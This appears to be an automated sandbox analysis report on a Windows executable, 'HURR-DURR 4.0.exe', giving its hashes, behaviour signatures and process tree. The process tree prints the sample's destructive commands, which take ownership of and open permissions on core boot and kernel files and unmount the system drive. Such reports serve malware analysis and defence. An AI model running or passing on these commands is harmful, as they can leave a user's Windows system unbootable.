Resubmissions

12/04/2023, 20:30

230412-zadedagd5s 8

12/04/2023, 20:26

230412-y7t8qaeh72 8

26/03/2023, 16:01

230326-tgmzhahb39 8

Analysis

  • max time kernel
    90s
  • max time network
    96s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    12/04/2023, 20:26

General

  • Target

    HURR-DURR 4.0.exe

  • Size

    1.7MB

  • MD5

    709002961b4a3d18185690cf820c4758

  • SHA1

    9e45ade994f2d711f12fd1bdd24c76c29190d919

  • SHA256

    39d024d9d590f29e0e522f1e41ac4e5c7bf67ebd261b3fa939b6e0ee883acc59

  • SHA512

    a759d2c16eb3166714d0422e931458ea1bac942f440bd159f7a130e9edaef2fe13090adb4de0ef65d6f66446d929f2152e879d1949c4860654564e9e8f8be916

  • SSDEEP

    12288:JoSWNTJ4Yo1VFnA4r5rraOVokssOcnh2tbbLqhS8aKxk:JoS2TJJo1V6u5rraOVouOcn4tbbR8aqk

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt 12 IoCs
  • Modifies file permissions 1 TTPs 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HURR-DURR 4.0.exe
    "C:\Users\Admin\AppData\Local\Temp\HURR-DURR 4.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4BC1.tmp\4BC2.tmp\4BC3.bat "C:\Users\Admin\AppData\Local\Temp\HURR-DURR 4.0.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:960
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://hurr-durr.cc/
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:516
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:516 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1468
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\winload.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:752
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\winresume.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1696
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\ntoskrnl.exe"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1524
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\hal.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1408
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\ntdll.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
      • C:\Windows\system32\takeown.exe
        takeown /f "C:\windows\system32\ci.dll"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:964
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\winload.exe" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1488
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\winresume.exe" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1948
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\ntoskrnl.exe" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1896
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\hal.dll" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1836
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\ntdll.dll" /grant everyone:F /t /c
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:932
      • C:\Windows\system32\icacls.exe
        icacls "C:\windows\system32\ci.dll" /grant everyone:F /t /cç
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2024
      • C:\Windows\system32\mountvol.exe
        mountvol C:\ /d
        3⤵
          PID:832

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\4BC1.tmp\4BC2.tmp\4BC3.bat

            Filesize

            1003B

            MD5

            fea29a2bbc979a1a83a9887b62240d6e

            SHA1

            b6c1ab3b84f50a1aa567c311b77fade00379b006

            SHA256

            abb42b3699e20f9208261c9ef6105f29be0c1005b47e966b5dd9a78845b6dcb6

            SHA512

            c8ed4b01d15956e668cf4ce215efd0e3708405a3aa2dff30c4a5e4e5a86959308c832f14a4d19b1c0ef9b1491e24fcf8d3388dc155911784b3b8d5b25f790164